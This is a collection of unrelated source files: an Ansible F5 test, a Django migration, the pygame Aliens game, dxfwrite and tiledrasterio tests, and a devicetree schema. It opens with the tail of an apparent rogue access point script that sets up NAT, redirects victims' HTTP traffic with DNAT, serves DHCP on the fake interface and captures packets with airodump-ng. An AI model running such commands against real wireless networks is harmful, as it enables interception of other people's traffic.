######### setting up a NAT
print '*'*20
print "setting up a NAT rules\n"
os.system("iptables --flush")
os.system("iptables --table nat --flush")
os.system("iptables --delete-chain")
os.system("iptables --table nat --delete-chain")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination "+internet_ip+":80")
os.system("iptables -t nat -A POSTROUTING -j MASQUERADE")
############# SETTING UP DHCP SERVER
print '*'*20
print 'Setting up DHCP Server for Client'
print '*'*20
time.sleep(3)
os.system("/usr/sbin/dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0")
time.sleep(3)
os.system("/etc/init.d/isc-dhcp-server start")
########## CREATING AIRDUMP
print "CREATING AIRDUMP\n"
print '*'*20
os.system("mkdir capture")
os.system("gnome-terminal -x airodump-ng -c "+CHANNEL+" mon0 -w capture/"+SSID)
############# STOP MONITORING INTERFACE
print '*'*20
cancel_command = str(raw_input('Enter quit() to exit the application\n'))
while cancel_command != 'quit()':
cancel_command = str(raw_input('Enter quit() to exit the application\n'))
print '*'*20
print 'Stopping the monitoring interface'
os.system("airmon-ng stop " + mon_iface)
os.system("ifconfig at0 down")
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_remote_role import ApiParameters
from library.modules.bigip_remote_role import ModuleParameters
from library.modules.bigip_remote_role import ModuleManager
from library.modules.bigip_remote_role import ArgumentSpec
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_remote_role import ApiParameters
from ansible.modules.network.f5.bigip_remote_role import ModuleParameters
from ansible.modules.network.f5.bigip_remote_role import ModuleManager
from ansible.modules.network.f5.bigip_remote_role import ArgumentSpec
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
# Fixture files live in a 'fixtures' directory next to this test module;
# parsed results are memoized in fixture_data keyed by absolute path.
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
    """Load (and cache) a fixture file, decoding it as JSON when possible."""
    full_path = os.path.join(fixture_path, name)
    if full_path in fixture_data:
        return fixture_data[full_path]
    with open(full_path) as handle:
        contents = handle.read()
    try:
        contents = json.loads(contents)
    except Exception:
        # Not JSON -- keep the raw text.
        pass
    fixture_data[full_path] = contents
    return contents
class TestParameters(unittest.TestCase):
    """Parameter-adapter tests for the bigip_remote_role module."""
    def test_module_parameters(self):
        """'none' terminal access from the playbook maps to 'disable'."""
        args = dict(
            terminal_access='none',
        )
        p = ModuleParameters(params=args)
        assert p.terminal_access == 'disable'
    def test_api_parameters(self):
        """The same mapping holds for values read back from the API fixture."""
        args = load_fixture('load_auth_remote_role_role_info_1.json')
        p = ApiParameters(params=args)
        assert p.terminal_access == 'disable'
class TestManager(unittest.TestCase):
    """ModuleManager-level tests driven through set_module_args."""
    def setUp(self):
        self.spec = ArgumentSpec()
    def test_create_remote_syslog(self, *args):
        """Creating a new resource reports changed=True.

        exists() is mocked False-then-True (absent before create, present
        after), and create_on_device is mocked so no device is contacted.
        """
        set_module_args(dict(
            name='foo',
            line_order=1000,
            attribute_string='bar',
            server='localhost',
            password='password',
            user='admin'
        ))
        module = AnsibleModule(
            argument_spec=self.spec.argument_spec,
            supports_check_mode=self.spec.supports_check_mode
        )
        # Override methods in the specific type of manager
        mm = ModuleManager(module=module)
        mm.exists = Mock(side_effect=[False, True])
        mm.create_on_device = Mock(return_value=True)
        results = mm.exec_module()
        assert results['changed'] is True
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Widen BadgeAssertion uniqueness from (course_id, user) to
        (course_id, user, mode)."""
        # Removing unique constraint on 'BadgeAssertion', fields ['course_id', 'user']
        db.delete_unique('certificates_badgeassertion', ['course_id', 'user_id'])
        # Adding unique constraint on 'BadgeAssertion', fields ['course_id', 'user', 'mode']
        db.create_unique('certificates_badgeassertion', ['course_id', 'user_id', 'mode'])
def backwards(self, orm):
# Removing unique constraint on 'BadgeAssertion', fields ['course_id', 'user', 'mode']
db.delete_unique('certificates_badgeassertion', ['course_id', 'user_id', 'mode'])
# Adding unique constraint on 'BadgeAssertion', fields ['course_id', 'user']
db.create_unique('certificates_badgeassertion', ['course_id', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.badgeassertion': {
'Meta': {'unique_together': "(('course_id', 'user', 'mode'),)", 'object_name': 'BadgeAssertion'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'certificates.badgeimageconfiguration': {
'Meta': {'object_name': 'BadgeImageConfiguration'},
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '125'})
},
'certificates.certificategenerationconfiguration': {
'Meta': {'ordering': "('-change_date',)", 'object_name': 'CertificateGenerationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificategenerationcoursesetting': {
'Meta': {'object_name': 'CertificateGenerationCourseSetting'},
'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'})
},
'certificates.certificatehtmlviewconfiguration': {
'Meta': {'ordering': "('-change_date',)", 'object_name': 'CertificateHtmlViewConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'configuration': ('django.db.models.fields.TextField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatewhitelist': {
'Meta': {'object_name': 'CertificateWhitelist'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'whitelist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'certificates.examplecertificate': {
'Meta': {'object_name': 'ExampleCertificate'},
'access_key': ('django.db.models.fields.CharField', [], {'default': "'25c5af67da3d47039aa8b00b3a929fa9'", 'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True'}),
'error_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'example_cert_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['certificates.ExampleCertificateSet']"}),
'full_name': ('django.db.models.fields.CharField', [], {'default': "u'John Do\\xeb'", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '255'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'88190407a2f14c429a7b5336e3fb0189'", 'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'certificates.examplecertificateset': {
'Meta': {'object_name': 'ExampleCertificateSet'},
'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'error_reason': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '512', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '32'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
unknown
|
codeparrot/codeparrot-clean
| ||
#! /usr/bin/env python
import random, os.path
#import basic pygame modules
import pygame
from pygame.locals import *
#see if we can load more than standard BMP
if not pygame.image.get_extended():
raise SystemExit("Sorry, extended image module required")
#game constants
MAX_SHOTS = 2 #most player bullets onscreen
ALIEN_ODDS = 22 #chances a new alien appears
BOMB_ODDS = 60 #chances a new bomb will drop
ALIEN_RELOAD = 12 #frames between new aliens
SCREENRECT = Rect(0, 0, 640, 480)
SCORE = 0
def load_image(file):
    """Load *file* from the data directory and convert it for fast blitting."""
    full_name = os.path.join('data', file)
    try:
        surface = pygame.image.load(full_name)
    except pygame.error:
        raise SystemExit('Could not load image "%s" %s'%(full_name, pygame.get_error()))
    return surface.convert()
def load_images(*files):
    """Load each named file via load_image and return them as a list."""
    return [load_image(name) for name in files]
class dummysound:
    """Silent stand-in used when the pygame mixer is unavailable."""

    def play(self):
        # Intentionally does nothing.
        pass
def load_sound(file):
    """Return a mixer Sound for *file*, or a silent dummy when unavailable."""
    if not pygame.mixer:
        return dummysound()
    path = os.path.join('data', file)
    try:
        return pygame.mixer.Sound(path)
    except pygame.error:
        print ('Warning, unable to load,', path)
        return dummysound()
# each type of game object gets an init and an
# update function. the update function is called
# once per frame, and it is when each object should
# change it's current position and state. the Player
# object actually gets a "move" function instead of
# update, since it is passed extra information about
# the keyboard
class Player(pygame.sprite.Sprite):
    """The player's ship, steered left/right by the keyboard."""
    speed = 10          # horizontal pixels per frame
    bounce = 24         # horizontal distance per vertical "bounce" step
    gun_offset = -11    # muzzle x-offset relative to the ship centre
    images = []         # filled in by main() before any Player is created

    def __init__(self):
        pygame.sprite.Sprite.__init__(self, self.containers)
        self.image = self.images[0]
        self.rect = self.image.get_rect()
        self.reloading = 0
        self.rect.centerx = SCREENRECT.centerx
        self.rect.bottom = SCREENRECT.bottom - 1
        self.origtop = self.rect.top
        self.facing = -1

    def move(self, direction):
        """Shift the ship horizontally; direction is -1, 0, or +1."""
        if direction:
            self.facing = direction
        self.rect.move_ip(direction*self.speed, 0)
        self.rect = self.rect.clamp(SCREENRECT)
        if direction < 0:
            self.image = self.images[0]
        elif direction > 0:
            self.image = self.images[1]
        # BUGFIX: use floor division. Under Python 3 "/" yields a float,
        # breaking the intended 0/1 bounce alternation (Python 2 era code).
        self.rect.top = self.origtop - (self.rect.left//self.bounce%2)

    def gunpos(self):
        """Return the (x, y) muzzle position used to spawn Shots."""
        pos = self.facing*self.gun_offset + self.rect.centerx
        return pos, self.rect.top
class Alien(pygame.sprite.Sprite):
    """An alien saucer that drifts sideways, dropping a row at each edge."""
    speed = 13       # horizontal pixels per frame
    animcycle = 12   # frames per animation image
    images = []      # filled in by main() before any Alien is created

    def __init__(self):
        pygame.sprite.Sprite.__init__(self, self.containers)
        self.image = self.images[0]
        self.rect = self.image.get_rect()
        self.facing = random.choice((-1,1)) * Alien.speed
        self.frame = 0
        if self.facing < 0:
            self.rect.right = SCREENRECT.right

    def update(self):
        self.rect.move_ip(self.facing, 0)
        if not SCREENRECT.contains(self.rect):
            # Hit a screen edge: reverse direction and descend one row.
            self.facing = -self.facing
            self.rect.top = self.rect.bottom + 1
            self.rect = self.rect.clamp(SCREENRECT)
        self.frame = self.frame + 1
        # BUGFIX: floor division. Under Python 3 "/" produces a float,
        # which raises TypeError when used as a list index.
        self.image = self.images[self.frame//self.animcycle%3]
class Explosion(pygame.sprite.Sprite):
    """A short-lived explosion animation centred on another sprite."""
    defaultlife = 12  # frames the explosion stays alive
    animcycle = 3     # frames per animation image
    images = []       # filled in by main() before any Explosion is created

    def __init__(self, actor):
        pygame.sprite.Sprite.__init__(self, self.containers)
        self.image = self.images[0]
        self.rect = self.image.get_rect()
        self.life = self.defaultlife
        self.rect.center = actor.rect.center

    def update(self):
        self.life = self.life - 1
        # BUGFIX: floor division. Under Python 3 "/" produces a float,
        # which raises TypeError when used as a list index.
        self.image = self.images[self.life//self.animcycle%2]
        if self.life <= 0:
            self.kill()
class Shot(pygame.sprite.Sprite):
    """A player bullet that travels straight up and dies at the top edge."""
    speed = -11   # negative: moves upward
    images = []   # filled in by main() before any Shot is created

    def __init__(self, pos):
        pygame.sprite.Sprite.__init__(self, self.containers)
        self.image = self.images[0]
        self.rect = self.image.get_rect(midbottom=pos)

    def update(self):
        """Advance upward; remove the sprite once it leaves the screen."""
        self.rect.move_ip(0, self.speed)
        if self.rect.top <= 0:
            self.kill()
class Bomb(pygame.sprite.Sprite):
    """A bomb dropped by an Alien; explodes when it nears the bottom."""
    speed = 9    # downward pixels per frame
    images = []  # filled in by main() before any Bomb is created

    def __init__(self, alien):
        pygame.sprite.Sprite.__init__(self, self.containers)
        self.image = self.images[0]
        self.rect = self.image.get_rect(
            centerx=alien.rect.centerx,
            bottom=alien.rect.bottom + 5)

    def update(self):
        """Fall; spawn an Explosion and die when reaching the ground line."""
        self.rect.move_ip(0, self.speed)
        if self.rect.bottom >= 470:
            Explosion(self)
            self.kill()
class Score(pygame.sprite.Sprite):
    """Sprite that renders the global SCORE in the lower-left corner."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.font = pygame.font.Font(None, 20)
        self.font.set_italic(1)
        self.color = Color('white')
        self.lastscore = -1
        self.update()
        self.rect = self.image.get_rect().move(10, 450)

    def update(self):
        """Re-render the text only when SCORE has actually changed."""
        if SCORE == self.lastscore:
            return
        self.lastscore = SCORE
        text = "Score: %d" % SCORE
        self.image = self.font.render(text, 0, self.color)
def main(winstyle = 0):
    """Run the Aliens game: initialize pygame, load assets, then run the
    per-frame loop until the player dies or the window is closed."""
    # Initialize pygame
    pygame.init()
    if pygame.mixer and not pygame.mixer.get_init():
        print ('Warning, no sound')
        pygame.mixer = None
    # Set the display mode
    winstyle = 0 # |FULLSCREEN
    bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)
    screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)
    #Load images, assign to sprite classes
    #(do this before the classes are used, after screen setup)
    img = load_image('player1.gif')
    Player.images = [img, pygame.transform.flip(img, 1, 0)]
    img = load_image('explosion1.gif')
    Explosion.images = [img, pygame.transform.flip(img, 1, 1)]
    Alien.images = load_images('alien1.gif', 'alien2.gif', 'alien3.gif')
    Bomb.images = [load_image('bomb.gif')]
    Shot.images = [load_image('shot.gif')]
    #decorate the game window
    icon = pygame.transform.scale(Alien.images[0], (32, 32))
    pygame.display.set_icon(icon)
    pygame.display.set_caption('Pygame Aliens')
    pygame.mouse.set_visible(0)
    #create the background, tile the bgd image
    bgdtile = load_image('background.gif')
    background = pygame.Surface(SCREENRECT.size)
    for x in range(0, SCREENRECT.width, bgdtile.get_width()):
        background.blit(bgdtile, (x, 0))
    screen.blit(background, (0,0))
    pygame.display.flip()
    #load the sound effects
    boom_sound = load_sound('boom.wav')
    shoot_sound = load_sound('car_door.wav')
    if pygame.mixer and pygame.mixer.music:
        music = os.path.join('data', 'house_lo.wav')
        pygame.mixer.music.load(music)
        pygame.mixer.music.play(-1)
    # Initialize Game Groups
    aliens = pygame.sprite.Group()
    shots = pygame.sprite.Group()
    bombs = pygame.sprite.Group()
    all = pygame.sprite.RenderUpdates()
    lastalien = pygame.sprite.GroupSingle()
    #assign default groups to each sprite class
    Player.containers = all
    Alien.containers = aliens, all, lastalien
    Shot.containers = shots, all
    Bomb.containers = bombs, all
    Explosion.containers = all
    Score.containers = all
    #Create Some Starting Values
    global score  # NOTE(review): lowercase 'score' is never defined or used; looks like a stale typo for SCORE
    alienreload = ALIEN_RELOAD
    kills = 0  # NOTE(review): never incremented or read anywhere in this function
    clock = pygame.time.Clock()
    #initialize our starting sprites
    global SCORE
    player = Player()
    Alien() #note, this 'lives' because it goes into a sprite group
    if pygame.font:
        all.add(Score())
    while player.alive():
        #get input
        for event in pygame.event.get():
            if event.type == QUIT or \
                (event.type == KEYDOWN and event.key == K_ESCAPE):
                return
        keystate = pygame.key.get_pressed()
        # clear/erase the last drawn sprites
        all.clear(screen, background)
        #update all the sprites
        all.update()
        #handle player input
        direction = keystate[K_RIGHT] - keystate[K_LEFT]
        player.move(direction)
        firing = keystate[K_SPACE]
        if not player.reloading and firing and len(shots) < MAX_SHOTS:
            Shot(player.gunpos())
            shoot_sound.play()
        # holding fire only shoots once per key press
        player.reloading = firing
        # Create new alien
        if alienreload:
            alienreload = alienreload - 1
        elif not int(random.random() * ALIEN_ODDS):
            Alien()
            alienreload = ALIEN_RELOAD
        # Drop bombs
        if lastalien and not int(random.random() * BOMB_ODDS):
            Bomb(lastalien.sprite)
        # Detect collisions
        for alien in pygame.sprite.spritecollide(player, aliens, 1):
            boom_sound.play()
            Explosion(alien)
            Explosion(player)
            SCORE = SCORE + 1
            player.kill()
        for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():
            boom_sound.play()
            Explosion(alien)
            SCORE = SCORE + 1
        for bomb in pygame.sprite.spritecollide(player, bombs, 1):
            boom_sound.play()
            Explosion(player)
            Explosion(bomb)
            player.kill()
        #draw the scene
        dirty = all.draw(screen)
        pygame.display.update(dirty)
        #cap the framerate
        clock.tick(40)
    # player is dead: fade out the music before returning
    if pygame.mixer and pygame.mixer.music:
        pygame.mixer.music.fadeout(1000)
    pygame.time.wait(1000)
# Invoke main() only when this file is executed as a script.
if __name__ == '__main__':
    main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#coding:utf-8
# Created: 27.03.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <mozman@gmx.at>"
try:
# Python 2.6 and earlier need the unittest2 package
# try: easy_install unittest2
# or download source from: http://pypi.python.org/pypi/unittest2
import unittest2 as unittest
except ImportError:
import unittest
from dxfwrite.helpers import normalize_dxf_chunk
from dxfwrite.base import dxfstr, DXFInt
from dxfwrite.const import POLYLINE_CLOSED
from dxfwrite.curves import Ellipse
# Reference DXF POLYLINE output (alternating group code / value lines) for a
# 16-segment, 0..90 degree Ellipse rotated 30 degrees; compared against the
# generated output in TestEllipse.test_implementation.
expected = " 0\nPOLYLINE\n 6\nSOLID\n 62\n3\n 8\n0\n 66\n1\n 10\n0.0\n 20\n" \
"0.0\n 30\n0.0\n 70\n8\n 0\nVERTEX\n 8\n0\n 10\n4.33012701892\n 20\n2.5\n 30\n" \
"0.0\n 0\nVERTEX\n 8\n0\n 10\n4.16225056329\n 20\n2.74261781728\n 30\n0.0\n 0\n" \
"VERTEX\n 8\n0\n 10\n3.95428935941\n 20\n2.9588227257\n 30\n0.0\n 0\nVERTEX\n" \
" 8\n0\n 10\n3.70824618737\n 20\n3.14653255383\n 30\n0.0\n 0\nVERTEX\n 8\n0\n" \
" 10\n3.42649057741\n 20\n3.30393955338\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"3.11173599008\n 20\n3.42952780893\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.76701368411\n 20\n3.5220878369\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.39564352377\n 20\n3.58072823363\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"2.0012020067\n 20\n3.60488426005\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"1.58748782034\n 20\n3.59432328042\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"1.15848525845\n 20\n3.54914700274\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"0.718325850239\n 20\n3.46979049926\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"0.271248571411\n 20\n3.35701801649\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-0.17844097944\n 20\n3.21191561509\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-0.626412046113\n 20\n3.0358807105\n 30\n0.0\n 0\nVERTEX\n 8\n0\n 10\n" \
"-1.06835042235\n 20\n2.83060861509\n 30\n0.0\n 0\nSEQEND\n"
class TestEllipse(unittest.TestCase):
    """Tests for dxfwrite.curves.Ellipse DXF generation."""

    def test_api(self):
        ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
                          startangle=0., endangle=360., rotation=30.,
                          segments=100, color=3, layer='0', linetype='SOLID')
        self.assertNotEqual(ellipse, None)

    def test_implementation(self):
        ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
                          startangle=0., endangle=90., rotation=30.,
                          segments=16, color=3, layer='0', linetype='SOLID')
        self.assertSequenceEqual(normalize_dxf_chunk(dxfstr(ellipse)),
                                 normalize_dxf_chunk(expected))

    def test_closed_ellipse(self):
        ellipse = Ellipse(center=(0., 0.), rx=5.0, ry=3.0,
                          startangle=0., endangle=360., rotation=30.,
                          segments=16, color=3, layer='0', linetype='SOLID')
        # Find the first integer tag carrying the polyline flags (group 70).
        flags = 0
        for tag in ellipse.__dxftags__():
            if isinstance(tag, DXFInt) and tag.group_code == 70:
                flags = tag.value
                break
        self.assertTrue(flags & POLYLINE_CLOSED)
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
from tiledrasterio._virtualraster import Band, VirtualRaster, Source
import numpy as np
def create_virtual_raster():
    """Build a 9x9 VirtualRaster whose single band tiles the 3x3 dummy
    dataset in a 3x3 grid of copies.

    Returns:
        VirtualRaster: an unopened dataset with one 'int64' band backed by
        nine Sources, one per tile.
    """
    src_path = "tests/data/dummy.asc"
    source_band = 1
    # BUGFIX/cleanup: removed the dead `source_window`/`destination_window`
    # locals the original assigned here but never used (the loop built its
    # own windows under different names).
    band = Band(1, 'int64')
    for r, c in np.ndindex((3, 3)):
        # Every tile reads the full 3x3 source window ...
        src_win = ((0, 3), (0, 3))
        # ... and maps it onto its own 3x3 destination cell.
        dst_win = ((r*3, r*3+3), (c*3, c*3+3))
        band.sources.append(Source(src_path, source_band, src_win, dst_win, source_nodata=None))
    dataset = VirtualRaster((9, 9))
    dataset.bands.append(band)
    return dataset
def test_read_full():
    """Reading band 1 must reproduce the dummy grid tiled 3x3."""
    base_tile = np.array([[-9999, -9999, 5],
                          [-9999, 20, 100],
                          [3, 8, 35]])
    expected = np.tile(base_tile, (3, 3))
    ds = create_virtual_raster()
    ds.open()
    actual = ds.read_band(1)
    ds.close()
    assert np.all(expected == actual)
def test_read_masked():
    """Masked reads must flag exactly the nodata (-9999) cells."""
    base_mask = np.array([[True, True, False],
                          [True, False, False],
                          [False, False, False]], dtype='bool')
    expected = np.tile(base_mask, (3, 3))
    ds = create_virtual_raster()
    ds.open()
    actual = ds.read_band(1, masked=True)
    ds.close()
    assert np.all(actual.mask == expected)
def test_read_full_scaled():
    """Reading into a smaller 6x6 buffer must downsample the 9x9 band."""
    base_tile = np.array([[-9999, 5],
                          [3, 35]], dtype='int32')
    expected = np.tile(base_tile, (3, 3))
    ds = create_virtual_raster()
    ds.open()
    out = np.zeros((6, 6), dtype='int32')
    actual = ds.read_band(1, out=out)
    ds.close()
    assert np.all(expected == actual)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/gpio/st,spear-spics-gpio.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: ST Microelectronics SPEAr SPI CS GPIO Controller
maintainers:
- Viresh Kumar <vireshk@kernel.org>
description: >
SPEAr platform provides a provision to control chipselects of ARM PL022 Prime
Cell spi controller through its system registers, which otherwise remains
  under PL022 control. If the chipselects remain under PL022 control, they are
  released as soon as the transfer is over and the TxFIFO becomes empty. This is not
desired by some of the device protocols above spi which expect (multiple)
transfers without releasing their chipselects.
Chipselects can be controlled by software by turning them as GPIOs. SPEAr
provides another interface through system registers through which software can
